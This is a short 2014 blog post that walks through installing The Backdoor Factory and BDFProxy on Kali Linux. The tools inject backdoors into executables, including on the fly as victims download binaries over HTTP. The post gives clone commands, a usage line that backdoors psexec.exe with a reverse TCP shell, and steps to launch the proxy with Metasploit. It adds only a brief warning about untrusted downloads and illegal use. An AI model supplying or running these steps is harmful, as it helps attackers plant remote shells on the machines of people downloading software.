Tuesday, October 28, 2014

Do Not Trust Your Download Even It Is From The Trusted Source

Joshua Pitts developed a tool suite for injecting backdoor to executable files of Windows, Linux and Mac OSX as well as FreeBSD. The process is fully automatically even you do not know what code cave is.

The tool suite is namely The Backdoor Factory and it also comes with a proxy to inject the backdoor while the victim is downloading the binaries - BDFProxy. The BDFProxy is working for HTTP protocol only.

Joshua Pitts discovers that one of the Tor Network Exit Nodes doing code injection to the binaries which are downloaded by victims via Tor network. His blog is showing how it will be and the interview report is talking about that.

How to install BDFactory on Kali Linux 1.0.9a?

BDFactory is working very well with Metasploit Framework.

apt-get update
apt-get dist-upgrade
apt-get autoclean
apt-get --purge autoremove

apt-get install python-pip

Install BDFactory :

cd ~
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory

To update :

Install BDFProxy :

cd ~
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy

To update :

Usage of BDFactory :

./backdoor.py -f psexec.exe -H -P 8080 -s reverse_shell_tcp

Usage of BDFProxy :

nano bdfproxy.cfg

*change the settings when necessary


msfconsole -r bdfproxy_msf_resource.rc

*if you are working with Pineapple, you need run ./wpBDF.sh to configure your environment


Don't trust your downloaded binary even it is downloaded from the trusted source when it is delievered via HTTP. Meanwhile, please download binaries in Tor network with care.

Please DO NOT use this tool suite for illegal purpose; otherwise, you will be put into the jail.


Evasion of Anti-Virus with Veil Framework and The Backdoor Factory
Transparently proxify virtual machines
Transparent Proxy (Linux)
Framework for Man-In-The-Middle Attack
HOWTO : Protect You From Being ARP Spoofing

That's all! See you.